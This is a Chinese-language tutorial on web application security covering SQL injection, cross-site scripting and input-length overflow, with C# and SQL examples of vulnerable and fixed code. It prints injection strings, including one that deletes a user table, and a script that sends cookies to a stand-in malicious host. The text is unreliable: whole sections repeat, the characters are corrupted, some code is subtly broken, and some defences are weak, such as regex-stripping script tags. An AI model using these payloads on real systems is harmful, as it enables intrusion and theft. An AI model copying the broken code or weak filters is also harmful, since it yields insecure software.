開發(fā)人員必須權(quán)衡好安全和功能之間的關(guān)系,這要看某種攻擊得逞的可能性有多大、這個(gè)系統(tǒng)有多重要。
開發(fā)人員可以運(yùn)用諸多基本原則來(lái)增強(qiáng)Web應(yīng)用程序的安全性。主要有以下三條原則:
盡量減小權(quán)限
對(duì)訪問(wèn)資源的賬戶進(jìn)行配置時(shí),始終要把這些賬戶的權(quán)限限制在需要的最小權(quán)限。
千萬(wàn)不要相信用戶的輸入,驗(yàn)證任何輸入的內(nèi)容
這對(duì)Web應(yīng)用程序來(lái)說(shuō)尤為重要。確保應(yīng)用程序并不依賴客戶端的驗(yàn)證。在服務(wù)器上應(yīng)當(dāng)重復(fù)所有的檢查工作,因?yàn)橐菦](méi)有約束條件,比較容易構(gòu)建網(wǎng)頁(yè)副本,有可能導(dǎo)致破壞性代碼在運(yùn)行,或者導(dǎo)致引起系統(tǒng)崩潰的拒絕服務(wù)(DoS)攻擊。
有節(jié)制地使用錯(cuò)誤消息
雖然在開發(fā)程序時(shí),詳細(xì)的錯(cuò)誤消息很有幫助,但它們對(duì)惡意用戶來(lái)說(shuō)同樣是寶貴的信息來(lái)源。所以指定函數(shù)名這類細(xì)節(jié)沒(méi)有太大的意義。這樣的細(xì)節(jié)記錄在另一個(gè)日志中比較好。
下面幾個(gè)示例介紹了沒(méi)有經(jīng)過(guò)驗(yàn)證的用戶輸入如何被壞人利用的具體情況,并且介紹了避免這些問(wèn)題的建議。
SQL注入
如果允許任意的SQL命令執(zhí)行,就會(huì)出現(xiàn)SQL注入(SQL injection)。當(dāng)SQL語(yǔ)句在代碼里面動(dòng)態(tài)構(gòu)建時(shí),通常會(huì)出現(xiàn)這種情況。
以下面用C#編寫的代碼為例,該代碼試圖檢查用戶名/密碼組合是否正確:
string username = txtUsername.Text;
string password = txtPassword.Text;
string SQL = "SELECT * FROM tblUsers
WHERE username = '"+ username +"'
AND password = '"+ password + "';";
//執(zhí)行SQL
用戶名和密碼從服務(wù)器端的兩個(gè)文本框獲取,并且SQL語(yǔ)句被創(chuàng)建,然后該語(yǔ)句執(zhí)行。如果沒(méi)有記錄返回,那么表明用戶輸入的詳細(xì)資料不正確,或者沒(méi)有經(jīng)過(guò)注冊(cè); 否則用戶可以進(jìn)入到下一個(gè)階段。
如果用戶在兩個(gè)文本框里面輸入了Joe和mypassword,那么SQL語(yǔ)句會(huì)是:
SELECT * FROM tblUsers
WHERE username = 'Joe'
AND password = 'mypassword';
這正是開發(fā)人員的意圖。不過(guò)要是用戶往密碼文本框里面輸入: ' OR 'a' = 'a,SQL就會(huì)是:
SELECT * FROM tblUsers
WHERE username = 'Joe'
AND password = ''
OR 'a' = 'a';
現(xiàn)在,密碼不重要了,因?yàn)?#039;a'='a'總是正確的。如果用來(lái)連接到數(shù)據(jù)庫(kù)的賬戶有權(quán)刪除數(shù)據(jù)而不是僅僅有權(quán)讀取數(shù)據(jù),就會(huì)出現(xiàn)更糟糕的情形。假設(shè)用戶往密碼文本框里面輸入: '; DELETE FROM tblUsers WHERE 'a' = 'a'。這會(huì)得出以下的語(yǔ)句:
SELECT * FROM tblUsers
WHERE username = 'Joe'
AND password = '';
DELETE FROM tblUsers
WHERE 'a' = 'a';
現(xiàn)在,整個(gè)用戶表就會(huì)被清空。
防止這類問(wèn)題主要有兩種辦法。一是,可以使用存儲(chǔ)過(guò)程(stored procedure)來(lái)執(zhí)行用戶驗(yàn)證步驟。設(shè)置參數(shù)值時(shí),避免使用單引號(hào)等特殊符號(hào),因而不可能為WHERE語(yǔ)句添加額外的斷言(predicate),也不會(huì)運(yùn)行多個(gè)SQL語(yǔ)句。譬如說(shuō),可以構(gòu)建像下面這樣的存儲(chǔ)過(guò)程,接受兩個(gè)輸入?yún)?shù)后,返回表明用戶是不是合法用戶的第三個(gè)參數(shù):
CREATE PROCEDURE spCheckUser
(
@Username VARCHAR(20),
@Password VARCHAR(20),
@IsValid BIT OUTPUT
)
AS
DECLARE @UserCount INT
SELECT @UserCount = COUNT(*)
FROM tblUsers
WHERE Username = @Username
AND Password = @Password
IF @UserCount = 1
SET @IsValid = 1
ELSE
SET @IsValid = 0
開發(fā)人員可以運(yùn)用諸多基本原則來(lái)增強(qiáng)Web應(yīng)用程序的安全性。主要有以下三條原則:
盡量減小權(quán)限
對(duì)訪問(wèn)資源的賬戶進(jìn)行配置時(shí),始終要把這些賬戶的權(quán)限限制在需要的最小權(quán)限。
千萬(wàn)不要相信用戶的輸入,驗(yàn)證任何輸入的內(nèi)容
這對(duì)Web應(yīng)用程序來(lái)說(shuō)尤為重要。確保應(yīng)用程序并不依賴客戶端的驗(yàn)證。在服務(wù)器上應(yīng)當(dāng)重復(fù)所有的檢查工作,因?yàn)橐菦](méi)有約束條件,比較容易構(gòu)建網(wǎng)頁(yè)副本,有可能導(dǎo)致破壞性代碼在運(yùn)行,或者導(dǎo)致引起系統(tǒng)崩潰的拒絕服務(wù)(DoS)攻擊。
有節(jié)制地使用錯(cuò)誤消息
雖然在開發(fā)程序時(shí),詳細(xì)的錯(cuò)誤消息很有幫助,但它們對(duì)惡意用戶來(lái)說(shuō)同樣是寶貴的信息來(lái)源。所以指定函數(shù)名這類細(xì)節(jié)沒(méi)有太大的意義。這樣的細(xì)節(jié)記錄在另一個(gè)日志中比較好。
下面幾個(gè)示例介紹了沒(méi)有經(jīng)過(guò)驗(yàn)證的用戶輸入如何被壞人利用的具體情況,并且介紹了避免這些問(wèn)題的建議。
SQL注入
如果允許任意的SQL命令執(zhí)行,就會(huì)出現(xiàn)SQL注入(SQL injection)。當(dāng)SQL語(yǔ)句在代碼里面動(dòng)態(tài)構(gòu)建時(shí),通常會(huì)出現(xiàn)這種情況。
以下面用C#編寫的代碼為例,該代碼試圖檢查用戶名/密碼組合是否正確:
string username = txtUsername.Text;
string password = txtPassword.Text;
string SQL = "SELECT * FROM tblUsers
WHERE username = '"+ username +"'
AND password = '"+ password + "';";
//執(zhí)行SQL
用戶名和密碼從服務(wù)器端的兩個(gè)文本框獲取,并且SQL語(yǔ)句被創(chuàng)建,然后該語(yǔ)句執(zhí)行。如果沒(méi)有記錄返回,那么表明用戶輸入的詳細(xì)資料不正確,或者沒(méi)有經(jīng)過(guò)注冊(cè); 否則用戶可以進(jìn)入到下一個(gè)階段。
如果用戶在兩個(gè)文本框里面輸入了Joe和mypassword,那么SQL語(yǔ)句會(huì)是:
SELECT * FROM tblUsers
WHERE username = 'Joe'
AND password = 'mypassword';
這正是開發(fā)人員的意圖。不過(guò)要是用戶往密碼文本框里面輸入: ' OR 'a' = 'a,SQL就會(huì)是:
SELECT * FROM tblUsers
WHERE username = 'Joe'
AND password = ''
OR 'a' = 'a';
現(xiàn)在,密碼不重要了,因?yàn)?#039;a'='a'總是正確的。如果用來(lái)連接到數(shù)據(jù)庫(kù)的賬戶有權(quán)刪除數(shù)據(jù)而不是僅僅有權(quán)讀取數(shù)據(jù),就會(huì)出現(xiàn)更糟糕的情形。假設(shè)用戶往密碼文本框里面輸入: '; DELETE FROM tblUsers WHERE 'a' = 'a'。這會(huì)得出以下的語(yǔ)句:
SELECT * FROM tblUsers
WHERE username = 'Joe'
AND password = '';
DELETE FROM tblUsers
WHERE 'a' = 'a';
現(xiàn)在,整個(gè)用戶表就會(huì)被清空。
防止這類問(wèn)題主要有兩種辦法。一是,可以使用存儲(chǔ)過(guò)程(stored procedure)來(lái)執(zhí)行用戶驗(yàn)證步驟。設(shè)置參數(shù)值時(shí),避免使用單引號(hào)等特殊符號(hào),因而不可能為WHERE語(yǔ)句添加額外的斷言(predicate),也不會(huì)運(yùn)行多個(gè)SQL語(yǔ)句。譬如說(shuō),可以構(gòu)建像下面這樣的存儲(chǔ)過(guò)程,接受兩個(gè)輸入?yún)?shù)后,返回表明用戶是不是合法用戶的第三個(gè)參數(shù):
CREATE PROCEDURE spCheckUser
(
@Username VARCHAR(20),
@Password VARCHAR(20),
@IsValid BIT OUTPUT
)
AS
DECLARE @UserCount INT
SELECT @UserCount = COUNT(*)
FROM tblUsers
WHERE Username = @Username
AND Password = @Password
IF @UserCount = 1
SET @IsValid = 1
ELSE
SET @IsValid = 0
現(xiàn)在,初始代碼經(jīng)改動(dòng)后可以使用存儲(chǔ)過(guò)程:
SqlCommand sqlCommand =
new SqlCommand("spCheckUser");
SqlParameter sqlParam =
new SqlParameter("@Username",
SqlDbType.VarChar, 20)
sqlParam.Value = txtUsername.Text;
sqlParam.Direction =
ParameterDirection.Input;
sqlCommand.Parameters.Add(sqlParam);
sqlParam =
new SqlParameter("@Password",
SqlDbType.VarChar, 20)
sqlParam.Value = txtPassword.Text;
sqlParam.Direction =
ParameterDirection.Input;
sqlCommand.Parameters.Add(sqlParam);
sqlParam =
new SqlParameter("@IsValid",
SqlDbType.Bit, 1)
sqlParam.Direction =
ParameterDirection.Output;
sqlCommand.Parameters.Add(sqlParam);
//執(zhí)行命令,并檢索輸出參數(shù)值
輸入和輸出參數(shù)使用相關(guān)類型來(lái)說(shuō)明。如今區(qū)別在于,基本的ADO.NET類會(huì)把字符串' OR 'a' = 'a當(dāng)成實(shí)際用戶的密碼來(lái)處理,而不是當(dāng)成可執(zhí)行SQL來(lái)處理。
避免這種安全漏洞的第二種辦法(也適用于所有的用戶輸入)就是,確保特殊字符或者字符串被禁用。對(duì)SQL而言,導(dǎo)致問(wèn)題的那個(gè)字符就是單引號(hào),所以如果沒(méi)法使用存儲(chǔ)過(guò)程,那么就把所有單引號(hào)變成雙引號(hào),這可以防止有人構(gòu)建額外的SQL:
string username = txtUsername.Text;
string password = txtPassword.Text;
username = username.Replace("'","''");
password = password.Replace("'","''");
string SQL = "SELECT *
FROM tblUsers
WHERE username = '"+ username +"'
AND password = '"+ password +"';";
//執(zhí)行SQL
現(xiàn)在,構(gòu)建的SQL成為:
SELECT *
FROM tblUsers
WHERE username = 'Joe'
AND password = '''
OR ''a'' = ''a';
這意味著該用戶沒(méi)有被識(shí)別。
SqlCommand sqlCommand =
new SqlCommand("spCheckUser");
SqlParameter sqlParam =
new SqlParameter("@Username",
SqlDbType.VarChar, 20)
sqlParam.Value = txtUsername.Text;
sqlParam.Direction =
ParameterDirection.Input;
sqlCommand.Parameters.Add(sqlParam);
sqlParam =
new SqlParameter("@Password",
SqlDbType.VarChar, 20)
sqlParam.Value = txtPassword.Text;
sqlParam.Direction =
ParameterDirection.Input;
sqlCommand.Parameters.Add(sqlParam);
sqlParam =
new SqlParameter("@IsValid",
SqlDbType.Bit, 1)
sqlParam.Direction =
ParameterDirection.Output;
sqlCommand.Parameters.Add(sqlParam);
//執(zhí)行命令,并檢索輸出參數(shù)值
輸入和輸出參數(shù)使用相關(guān)類型來(lái)說(shuō)明。如今區(qū)別在于,基本的ADO.NET類會(huì)把字符串' OR 'a' = 'a當(dāng)成實(shí)際用戶的密碼來(lái)處理,而不是當(dāng)成可執(zhí)行SQL來(lái)處理。
避免這種安全漏洞的第二種辦法(也適用于所有的用戶輸入)就是,確保特殊字符或者字符串被禁用。對(duì)SQL而言,導(dǎo)致問(wèn)題的那個(gè)字符就是單引號(hào),所以如果沒(méi)法使用存儲(chǔ)過(guò)程,那么就把所有單引號(hào)變成雙引號(hào),這可以防止有人構(gòu)建額外的SQL:
string username = txtUsername.Text;
string password = txtPassword.Text;
username = username.Replace("'","''");
password = password.Replace("'","''");
string SQL = "SELECT *
FROM tblUsers
WHERE username = '"+ username +"'
AND password = '"+ password +"';";
//執(zhí)行SQL
現(xiàn)在,構(gòu)建的SQL成為:
SELECT *
FROM tblUsers
WHERE username = 'Joe'
AND password = '''
OR ''a'' = ''a';
這意味著該用戶沒(méi)有被識(shí)別。
跨站腳本
跨站腳本(有時(shí)縮寫成XSS)允許來(lái)自一個(gè)地方的代碼在另一個(gè)網(wǎng)站里面運(yùn)行。正如在大多數(shù)情況下一樣,只要驗(yàn)證用戶輸入的內(nèi)容就可以避免這問(wèn)題。以接受HTML格式的帖子的公告牌為例。假定用戶在發(fā)布消息中加入了以下內(nèi)容:
Hello everyone
<script>
alert("Hi!");
</script>
要是不對(duì)腳本塊進(jìn)行任何驗(yàn)證及刪除,這條消息就會(huì)出現(xiàn),標(biāo)準(zhǔn)的警告信息也會(huì)顯示。假定這個(gè)示例沒(méi)有惡意,再考慮下一個(gè)示例:
var I = new Image();
i.src =
"http://www.maliciousSite.com/save.asp"
+ escape(document.cookie);
現(xiàn)在,該用戶的cookie會(huì)被傳送到惡意網(wǎng)站,然后記錄在網(wǎng)絡(luò)日志里面。這不是原先需要的操作,可能會(huì)泄露私人信息,或者讓不懷好意的人以合法用戶的身份登錄到公告牌。可以通過(guò)采用正則表達(dá)式來(lái)搜索及清除像< script>及其內(nèi)容這些元素的辦法來(lái)防止這個(gè)問(wèn)題。
數(shù)據(jù)溢出
數(shù)據(jù)過(guò)多可能會(huì)帶來(lái)問(wèn)題,這有兩個(gè)原因。一是,因?yàn)閼?yīng)用程序往往會(huì)崩潰,譬如說(shuō),如果程序試圖把50個(gè)字符寫入到列大小只有40個(gè)字符的數(shù)據(jù)庫(kù)表,就會(huì)引起程序崩潰。顯然,良好的錯(cuò)誤捕獲方法應(yīng)當(dāng)可以防止這一問(wèn)題,但如果用戶輸入的是有效內(nèi)容,而且來(lái)自可信用戶,那么這個(gè)問(wèn)題往往不會(huì)發(fā)生。數(shù)據(jù)過(guò)多輕則帶來(lái)差勁的用戶體驗(yàn),重則導(dǎo)致嚴(yán)重消耗服務(wù)器資源,要是問(wèn)題頻頻發(fā)生,還會(huì)導(dǎo)致整個(gè)服務(wù)無(wú)法使用。如果輸入內(nèi)容專門旨在導(dǎo)致錯(cuò)誤、機(jī)器過(guò)載,這就叫拒絕服務(wù)(DoS)攻擊。
第二個(gè)問(wèn)題是緩沖器溢出。有時(shí)候,輸入的數(shù)據(jù)會(huì)溢出旨在存放它的內(nèi)存區(qū),而成為可執(zhí)行代碼的一部分。只要對(duì)輸入到輸入框中的數(shù)據(jù)進(jìn)行精心設(shè)計(jì),攻擊者就可以在服務(wù)器上執(zhí)行任意代碼。
為了避免該問(wèn)題,不要依靠客戶端技術(shù),譬如設(shè)置文本框的最大長(zhǎng)度屬性。這很容易被跳過(guò)。有些瀏覽器(包括IE在內(nèi))允許javascript URL。如果網(wǎng)頁(yè)的文本框有一個(gè)標(biāo)為txtSurname的id,那么下列代碼拷貝到瀏覽器的地址欄上后,就會(huì)改變最大長(zhǎng)度屬性:
javascript:document.getElementById
("txtSurname").maxLength = 1000
防止這個(gè)問(wèn)題的方法仍然是在服務(wù)器上進(jìn)行檢查,看看輸入內(nèi)容是否超過(guò)所需長(zhǎng)度; 必要的話縮減輸入內(nèi)容。(作者單位系河南省鎮(zhèn)平縣教師進(jìn)修學(xué)校)
跨站腳本(有時(shí)縮寫成XSS)允許來(lái)自一個(gè)地方的代碼在另一個(gè)網(wǎng)站里面運(yùn)行。正如在大多數(shù)情況下一樣,只要驗(yàn)證用戶輸入的內(nèi)容就可以避免這問(wèn)題。以接受HTML格式的帖子的公告牌為例。假定用戶在發(fā)布消息中加入了以下內(nèi)容:
Hello everyone
<script>
alert("Hi!");
</script>
要是不對(duì)腳本塊進(jìn)行任何驗(yàn)證及刪除,這條消息就會(huì)出現(xiàn),標(biāo)準(zhǔn)的警告信息也會(huì)顯示。假定這個(gè)示例沒(méi)有惡意,再考慮下一個(gè)示例:
var I = new Image();
i.src =
"http://www.maliciousSite.com/save.asp"
+ escape(document.cookie);
現(xiàn)在,該用戶的cookie會(huì)被傳送到惡意網(wǎng)站,然后記錄在網(wǎng)絡(luò)日志里面。這不是原先需要的操作,可能會(huì)泄露私人信息,或者讓不懷好意的人以合法用戶的身份登錄到公告牌。可以通過(guò)采用正則表達(dá)式來(lái)搜索及清除像< script>及其內(nèi)容這些元素的辦法來(lái)防止這個(gè)問(wèn)題。
數(shù)據(jù)溢出
數(shù)據(jù)過(guò)多可能會(huì)帶來(lái)問(wèn)題,這有兩個(gè)原因。一是,因?yàn)閼?yīng)用程序往往會(huì)崩潰,譬如說(shuō),如果程序試圖把50個(gè)字符寫入到列大小只有40個(gè)字符的數(shù)據(jù)庫(kù)表,就會(huì)引起程序崩潰。顯然,良好的錯(cuò)誤捕獲方法應(yīng)當(dāng)可以防止這一問(wèn)題,但如果用戶輸入的是有效內(nèi)容,而且來(lái)自可信用戶,那么這個(gè)問(wèn)題往往不會(huì)發(fā)生。數(shù)據(jù)過(guò)多輕則帶來(lái)差勁的用戶體驗(yàn),重則導(dǎo)致嚴(yán)重消耗服務(wù)器資源,要是問(wèn)題頻頻發(fā)生,還會(huì)導(dǎo)致整個(gè)服務(wù)無(wú)法使用。如果輸入內(nèi)容專門旨在導(dǎo)致錯(cuò)誤、機(jī)器過(guò)載,這就叫拒絕服務(wù)(DoS)攻擊。
第二個(gè)問(wèn)題是緩沖器溢出。有時(shí)候,輸入的數(shù)據(jù)會(huì)溢出旨在存放它的內(nèi)存區(qū),而成為可執(zhí)行代碼的一部分。只要對(duì)輸入到輸入框中的數(shù)據(jù)進(jìn)行精心設(shè)計(jì),攻擊者就可以在服務(wù)器上執(zhí)行任意代碼。
為了避免該問(wèn)題,不要依靠客戶端技術(shù),譬如設(shè)置文本框的最大長(zhǎng)度屬性。這很容易被跳過(guò)。有些瀏覽器(包括IE在內(nèi))允許javascript URL。如果網(wǎng)頁(yè)的文本框有一個(gè)標(biāo)為txtSurname的id,那么下列代碼拷貝到瀏覽器的地址欄上后,就會(huì)改變最大長(zhǎng)度屬性:
javascript:document.getElementById
("txtSurname").maxLength = 1000
防止這個(gè)問(wèn)題的方法仍然是在服務(wù)器上進(jìn)行檢查,看看輸入內(nèi)容是否超過(guò)所需長(zhǎng)度; 必要的話縮減輸入內(nèi)容。(作者單位系河南省鎮(zhèn)平縣教師進(jìn)修學(xué)校)
